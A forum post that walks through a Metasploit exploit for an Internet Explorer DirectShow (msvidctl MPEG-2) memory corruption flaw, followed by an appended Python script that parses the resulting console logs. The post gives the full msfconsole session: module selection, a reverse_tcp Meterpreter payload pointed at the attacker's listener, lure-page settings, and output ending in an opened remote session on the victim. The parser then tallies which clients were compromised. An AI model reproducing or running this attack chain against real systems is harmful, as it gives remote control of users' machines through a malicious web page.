Originally Posted by Jabra
There is a new IE exploit that has been recently released into the wild. The exploit is for DirectShow (msvidctl.dll) MPEG-2. The exploit utilizes an ActiveX control in addition to a GIF file include, to perform a memory corruption attack. The vulnerability affects users of both IE 6 and IE7.
Today, the exploit was added to the Metasploit framework by HD Moore (the author of Metasploit). The module was written by Trancer and was posted at http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/.
Thus far, I have verified the exploit to be working on IE 7. Since the exploit works by using an ActiveX control, the victim will need to allow the ActiveX control to run.
=[ msf v3.3-dev
+ -- --=[ 384 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 162 aux

msf > use windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
msf exploit(msvidctl_mpeg2) > set LPORT 443
LPORT => 443
msf exploit(msvidctl_mpeg2) > set URIPATH /test.html
URIPATH => /test.html
msf exploit(msvidctl_mpeg2) > set SRVPORT 9000
SRVPORT => 9000
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9000/test.html
[*] Local IP: http://192.168.1.50:9000/test.html
[*] Server started.
[*] Sending HTML to 192.168.1.100:1091...
[*] Sending exploit to 192.168.1.100:1091...
[*] Sending GIF to 192.168.1.100:1091...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.1.50:443 -> 192.168.1.100:1092)
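The console output above shows the delivery chain (HTML, exploit, GIF on one client connection, then the staged callback on a second one). As an added example that is not part of the post, the parser below turns such msfconsole output into a per-client record, which is useful when writing up an engagement or checking which test hosts actually called back; the sample log is constructed from the output above and the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: the relevant msfconsole lines from the post.
SAMPLE_LOG = """\
[*] Using URL: http://0.0.0.0:9000/test.html
[*] Local IP: http://192.168.1.50:9000/test.html
[*] Server started.
[*] Sending HTML to 192.168.1.100:1091...
[*] Sending exploit to 192.168.1.100:1091...
[*] Sending GIF to 192.168.1.100:1091...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.1.50:443 -> 192.168.1.100:1092)
"""

IP = r"(\d+\.\d+\.\d+\.\d+)"
SEND_RE = re.compile(r"^\[\*\] Sending (\w+) to " + IP + r":(\d+)")
SESSION_RE = re.compile(r"^\[\*\] Meterpreter session (\d+) opened \((\S+) -> " + IP + r":(\d+)\)")
URL_RE = re.compile(r"^\[\*\] Local IP: (\S+)")

def parse_console_log(text):
    """Group 'Sending ...' and 'session opened' lines by client IP."""
    clients = defaultdict(lambda: {"delivered": [], "sessions": []})
    lure_url = None
    for line in text.splitlines():
        m = URL_RE.match(line)
        if m:
            lure_url = m.group(1)       # URL the victim browser must fetch
            continue
        m = SEND_RE.match(line)
        if m:                           # HTML / exploit / GIF served to a client port
            kind, ip, port = m.groups()
            clients[ip]["delivered"].append((kind, int(port)))
            continue
        m = SESSION_RE.match(line)
        if m:                           # reverse connection back to the handler
            sid, handler, ip, port = m.groups()
            clients[ip]["sessions"].append(
                {"id": int(sid), "handler": handler, "src_port": int(port)})
    return {"lure_url": lure_url, "clients": dict(clients)}

def compromised_hosts(parsed):
    """Clients that received the full HTML/exploit/GIF chain and then opened a session."""
    chain = ["HTML", "exploit", "GIF"]
    return [ip for ip, info in parsed["clients"].items()
            if [k for k, _ in info["delivered"]][:3] == chain and info["sessions"]]
```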